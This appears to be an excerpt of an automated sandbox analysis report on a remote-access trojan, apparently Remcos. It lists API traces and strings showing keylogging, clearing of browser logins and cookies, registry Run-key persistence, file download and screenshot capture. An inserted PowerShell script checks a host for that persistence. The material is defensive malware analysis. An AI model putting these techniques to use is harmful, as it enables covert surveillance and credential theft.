                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 2005118841-1866435925
                                • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • waveInPrepareHeader.WINMM(00556A30,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                • waveInAddBuffer.WINMM(00556A30,00000020,?,00000000,00401A15), ref: 0040185F
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferHeaderPrepare
                                • String ID: 0jU$XMG
                                • API String ID: 2315374483-2349053105
                                • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                                • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: FormatFreeLocalMessage
                                • String ID: @J@$PkGNG
                                • API String ID: 1427518018-1416487119
                                • Opcode ID: e6692f477abb5315ab95d0a6b8ad5d72714dea7d13d74ae1a0c0e8a867cee630
                                • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                                • Opcode Fuzzy Hash: e6692f477abb5315ab95d0a6b8ad5d72714dea7d13d74ae1a0c0e8a867cee630
                                • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                                • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,759237E0,?), ref: 0041384D
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,759237E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                • API String ID: 1818849710-1051519024
                                • Opcode ID: 7402a2b63bcdafcb128c4f053b5539bf219f88ac2658cd62b5e42ce82679dadc
                                • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                • Opcode Fuzzy Hash: 7402a2b63bcdafcb128c4f053b5539bf219f88ac2658cd62b5e42ce82679dadc
                                • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: Control Panel\Desktop
                                • API String ID: 1818849710-27424756
                                • Opcode ID: a1b035586d8a94c78f1a8b9bfdab4f73b16582c77fe3bde9cdb94950c835db19
                                • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                • Opcode Fuzzy Hash: a1b035586d8a94c78f1a8b9bfdab4f73b16582c77fe3bde9cdb94950c835db19
                                • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: /C $cmd.exe$open
                                • API String ID: 587946157-3896048727
                                • Opcode ID: c4367f8ee6a7455f33dbff058f7f38a065b0826cdce92a2e59ef50dc08291be7
                                • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                • Opcode Fuzzy Hash: c4367f8ee6a7455f33dbff058f7f38a065b0826cdce92a2e59ef50dc08291be7
                                • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                • API String ID: 3472027048-1236744412
                                • Opcode ID: 37d1bfc06d07939eb796f91d911b97d059918d73889df1aded7d392522dc90d3
                                • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                • Opcode Fuzzy Hash: 37d1bfc06d07939eb796f91d911b97d059918d73889df1aded7d392522dc90d3
                                • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • EnumDisplayMonitors.USER32(00000000,00000000,004195CF,00000000), ref: 004194F5
                                • EnumDisplayDevicesW.USER32(?), ref: 00419525
                                • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 0041959A
                                • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195B7
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: DisplayEnum$Devices$Monitors
                                • String ID:
                                • API String ID: 1432082543-0
                                • Opcode ID: c3c799bd19875220888047b0ecefc3fe56039ce96ce98d62d0ecf08c91911ae4
                                • Instruction ID: 9f89b1fc864c89aa53311e19646eec67f909338e1adf78e73a6452d568b12732
                                • Opcode Fuzzy Hash: c3c799bd19875220888047b0ecefc3fe56039ce96ce98d62d0ecf08c91911ae4
                                • Instruction Fuzzy Hash: 6F218072108314ABD221DF26DC49EABBBECEBD1764F00053FF459D3190EB749A49C66A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                  • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                  • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                • Sleep.KERNEL32(00000BB8), ref: 0041277A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQuerySleepValue
                                • String ID: 8SG$exepath$hdF
                                • API String ID: 4119054056-3379396883
                                • Opcode ID: bfa7946a20d0ba0244eb19560f4c3b0d7a78169555de0d07121ed9ca0cce8570
                                • Instruction ID: f3cf03c5a64ef847c6da3637c810c9cb64e8e240b2c65477c235684d5dc29c85
                                • Opcode Fuzzy Hash: bfa7946a20d0ba0244eb19560f4c3b0d7a78169555de0d07121ed9ca0cce8570
                                • Instruction Fuzzy Hash: B52148A0B0030427DA00B7366D46EBF724E8B84318F40443FB916E72D3EEBC9C48426D
                                Uniqueness

                                Uniqueness Score: -1.00%
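Host triage for the two registry behaviours recorded in the entries above, as an added example that is not part of the Joe Sandbox report and not code from the sample. The RegCreateKeyW/RegSetValueExW pair at 0041381F/0041384D writes a value of type 1 (REG_SZ) under HKEY_LOCAL_MACHINE (0x80000002) \Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, a logon autostart location that many persistence checklists omit, and the RegOpenKeyExA/RegQueryValueExA pair at 00413714/0041372D reads a value under HKEY_CURRENT_USER (0x80000001) whose name, "exepath", appears in that function's strings while the subkey name does not (it is supplied at run time). The script lists every value in the Policies\Explorer\Run key, also checks the HKCU copy of that key (an assumption that generalises the report, which shows only HKLM), and scans each direct child of HKCU\Software for a value named exepath, hashing any executable the data points to so it can be compared with the hashes elsewhere in the report. Function names and output fields are the script's own; the report does not state how the exepath data is encoded, so it is returned as found.

```powershell
# Added triage script: not part of the Joe Sandbox report and not code from the sample.
# Checks the two registry behaviours the report ties to the svcs payload (process 3).
# Assumptions beyond the report: the HKCU copy of Policies\Explorer\Run is checked too,
# and the Remcos "exepath" value is searched under every direct child of HKCU\Software,
# because the report shows the value name but not the subkey it lives in.

function Get-PolicyRunEntries {
    # Explorer processes this key at logon like the well-known Run keys, but it is
    # missing from many persistence checklists; any value here deserves a look.
    $keys = @(
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run',   # 0x80000002 in the report
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'    # assumption, not in the report
    )
    foreach ($path in $keys) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $key = Get-Item -LiteralPath $path
        foreach ($name in $key.GetValueNames()) {
            [pscustomobject]@{
                Check = 'PoliciesExplorerRun'
                Key   = $key.Name
                Name  = $name
                Kind  = $key.GetValueKind($name)
                Data  = $key.GetValue($name)
            }
        }
    }
}

function Get-ExePathMarkers {
    # The report exposes only the value name ("exepath", read with RegQueryValueExA under
    # HKEY_CURRENT_USER); the subkey is resolved at run time, so enumerate HKCU\Software.
    Get-ChildItem -LiteralPath 'HKCU:\Software' -ErrorAction SilentlyContinue | ForEach-Object {
        if ($_.GetValueNames() -contains 'exepath') {
            [pscustomobject]@{
                Check = 'ExePathMarker'
                Key   = $_.Name
                Name  = 'exepath'
                Kind  = $_.GetValueKind('exepath')
                Data  = $_.GetValue('exepath')
            }
        }
    }
}

function Resolve-ReferencedFile {
    param([object]$Data)
    # Best effort: Run-key data is usually "<path>" or "<path>" <args>; exepath may not be
    # a plain string at all, in which case nothing is resolved and the raw data is kept.
    if ($Data -isnot [string]) { return $null }
    $candidate = if ($Data -match '^"([^"]+)"') { $Matches[1] } else { $Data.Trim() }
    $candidate = [Environment]::ExpandEnvironmentVariables($candidate)
    if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    return $null
}

function Invoke-RemcosRegistryTriage {
    $findings = @(Get-PolicyRunEntries) + @(Get-ExePathMarkers)
    foreach ($f in $findings) {
        $file   = Resolve-ReferencedFile -Data $f.Data
        $sha256 = if ($file) { (Get-FileHash -LiteralPath $file -Algorithm SHA256).Hash } else { $null }
        $f | Add-Member -NotePropertyName File   -NotePropertyValue $file   -PassThru |
             Add-Member -NotePropertyName SHA256 -NotePropertyValue $sha256 -PassThru
    }
}

Invoke-RemcosRegistryTriage | Format-List
```

Run it from a PowerShell 5.1 or later prompt on the suspect host; reading both keys works without elevation, but hashing a file that sits under a protected directory may not. Control Panel\Desktop and WallpaperStyle (the RegCreateKeyA/RegSetValueExA pair at 0041377E/004137A6) are deliberately not used as indicators: any legitimate wallpaper change writes the same values.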

                                APIs
                                  • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                  • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                  • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                • Sleep.KERNEL32(000001F4), ref: 0040A573
                                • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$ForegroundLength
                                • String ID: [ $ ]
                                • API String ID: 3309952895-93608704
                                • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: SystemTimes$Sleep__aulldiv
                                • String ID:
                                • API String ID: 188215759-0
                                • Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                • Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
                                • Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                • Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                                • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                • Opcode Fuzzy Hash: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                                • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
                                • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
                                Similarity
                                • API ID: File$CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 3919263394-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                  • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                • _UnwindNestedFrames.LIBCMT ref: 00439891
                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                Similarity
                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                • String ID:
                                • API String ID: 2633735394-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                Similarity
                                • API ID: MetricsSystem
                                • String ID:
                                • API String ID: 4116985748-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE
                                  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                Strings
                                Similarity
                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                • String ID: image/jpeg
                                • API String ID: 1291196975-3785015651
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                Strings
                                Similarity
                                • API ID:
                                • String ID: ACP$OCP
                                • API String ID: 0-711371036
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
                                • GetLastError.KERNEL32 ref: 0044B804
                                Strings
                                Similarity
                                • API ID: ErrorFileLastWrite
                                • String ID: PkGNG
                                • API String ID: 442123175-263838557
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                                • GetLastError.KERNEL32 ref: 0044B716
                                Strings
                                Similarity
                                • API ID: ErrorFileLastWrite
                                • String ID: PkGNG
                                • API String ID: 442123175-263838557
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA
                                  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF
                                  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                Strings
                                Similarity
                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                • String ID: image/png
                                • API String ID: 1291196975-2966254431
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Sleep.KERNEL32 ref: 00416640
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                Strings
                                Similarity
                                • API ID: DownloadFileSleep
                                • String ID: !D@
                                • API String ID: 1931167962-604454484
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                Strings
                                Similarity
                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                • String ID: Online Keylogger Stopped
                                • API String ID: 1623830855-1496645233
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Similarity
                                • API ID: _free
                                • String ID: $G
                                • API String ID: 269201875-4251033865
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                Strings
                                Similarity
                                • API ID: LocaleValid
                                • String ID: IsValidLocaleName$JD
                                • API String ID: 1901932003-2234456777
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                Strings
                                Similarity
                                • API ID: ExistsFilePath
